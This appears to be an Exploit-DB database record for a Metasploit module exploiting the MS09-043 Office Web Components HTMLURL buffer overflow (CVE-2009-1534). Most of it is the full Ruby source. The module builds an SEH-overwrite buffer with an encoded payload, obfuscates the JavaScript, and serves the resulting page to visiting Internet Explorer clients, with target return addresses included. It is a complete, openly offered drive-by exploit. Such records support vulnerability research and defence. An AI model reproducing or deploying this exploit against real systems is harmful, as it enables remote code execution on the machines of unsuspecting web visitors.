{"id": "EDB-ID:16542", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)", "description": "", "published": "2010-04-30T00:00:00", "modified": "2010-04-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/16542", "reporter": "Metasploit", "references": [], "cvelist": ["2009-1534"], "immutableFields": [], "lastseen": "2022-08-16T04:52:26", "viewCount": 11, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-1534"]}]}, "exploitation": null, "vulnersScore": 0.3}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "1c452cd4d7931a0081397e51710c515e"}, "sourceHref": "https://www.exploit-db.com/download/16542", "sourceData": "##\r\n# $Id: ms09_043_owc_htmlurl.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft OWC Spreadsheet HTMLURL Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Microsoft's Office Web Components.\r\n\t\t\t\tWhen passing an overly long string as the \"HTMLURL\" parameter an attacker can\r\n\t\t\t\texecute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-1534' ],\r\n\t\t\t\t\t[ 'OSVDB', '56916' ],\r\n\t\t\t\t\t[ 'BID', '35992' ],\r\n\t\t\t\t\t[ 'MSB', 'MS09-043' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\xf0\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# 'ProgId' => \"OWC.Spreadsheet.9\"\r\n\t\t\t\t\t# 'ClassId' => \"0002E512-0000-0000-C000-000000000046\",\r\n\r\n\t\t\t\t\t[ 'Windows XP SP3 - IE6 - Office XP SP0',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ClassId' => \"0002E510-0000-0000-C000-000000000046\",\r\n\t\t\t\t\t\t\t'Offset' => 31337,\r\n\t\t\t\t\t\t\t'Ret' => 0x42424242 # p/p/r in msohev.dll ??\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Windows XP SP3 - IE6 - Office XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ClassId' => \"0002E511-0000-0000-C000-000000000046\",\r\n\t\t\t\t\t\t\t'Offset' => ((4096*7) + 1076),\r\n\t\t\t\t\t\t\t'Ret' => 0x32521239 # p/p/r in msohev.dll 10.0.2609.0\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Aug 11 2009',\r\n\t\t\t'DefaultTarget' => 1))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URIPATH', [ true, \"The URI to use.\", \"/\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef big_alnum(num)\r\n\t\tdivisor = 2048 + rand(2048)\r\n\t\tpad_pages = num / divisor\r\n\t\tpad_left = num % divisor\r\n\r\n\t\tret = ''\r\n\t\tret << rand_text_alphanumeric(divisor) * pad_pages if pad_pages\r\n\t\tret << rand_text_alphanumeric(pad_left) if pad_left\r\n\t\tret\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n=begin\r\n\t\t# Only respond to any client twice...\r\n\t\tif (@sent[cli.peerhost] > 1)\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\t\t@sent[cli.peerhost] += 1\r\n=end\r\n\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# ActiveX parameter(s)\r\n\t\tclsid = target['ClassId']\r\n\r\n\t\t# Exploitation parameter(s)\r\n\t\tseh_offset = target['Offset']\r\n\r\n\t\t# Build the buffer.\r\n\t\tstring = big_alnum(seh_offset)\r\n\t\tstring << generate_seh_record(target.ret)\r\n\t\tstring << payload.encoded\r\n\t\tstring << big_alnum(40960 - string.length)\r\n\t\tstring = Rex::Text.to_unescape(string)\r\n\r\n\t\t# Randomize the object and function names\r\n\t\tobjid = rand_text_alpha(8+rand(8))\r\n\t\tfnname = rand_text_alpha(8+rand(8))\r\n\r\n\t\t# Build the final JavaScript\r\n\t\tjs = %Q|\r\nfunction #{fnname}()\r\n{\r\nvar ver1 = -1;\r\nvar ver3 = -1;\r\ntry {\r\nver3 = #{objid}.Version.split('.')[3];\r\nver3 = parseInt(ver3);\r\nver1 = #{objid}.Version.split('.')[0];\r\nver1 = parseInt(ver1);\r\n} catch (e) { }\r\nif (ver1 == 9 && ver3 <= 8966)\r\n{\r\nhistory.go(0);\r\n#{objid}.HTMLURL = unescape('#{string}');\r\n}\r\n}\r\n|\r\n\r\n\t\t# Obfuscate the javascript\r\n\t\topts = {\r\n\t\t\t'Strings' => false, # way too slow to obfuscate this monster\r\n\t\t\t'Symbols' => {\r\n\t\t\t\t'Variables' => %w{ long ver1 ver3 },\r\n\t\t\t}\r\n\t\t}\r\n\t\tjs = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\r\n\t\tjs.obfuscate()\r\n#<body onload=\"history.go(0); #{fnname}()\">\r\n\r\n\t\t# Build the final HTML\r\n\t\tcontent = %Q|<html>\r\n<head>\r\n<script language=javascript>\r\n#{js}\r\n</script>\r\n</head>\r\n<body onload=\"#{fnname}()\">\r\n<object classid=\"clsid:#{clsid}\" id=\"#{objid}\">\r\n</object>\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content,\r\n\t\t\t{\r\n\t\t\t\t# The vuln requires that this be the same on both requests.\r\n\t\t\t\t'Last-Modified' => 'Tue, 11 Aug 2009 07:13:49 GMT',\r\n\t\t\t})\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\nend", "osvdbidlist": ["56916"], "exploitType": "remote", "verified": true}
{}
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)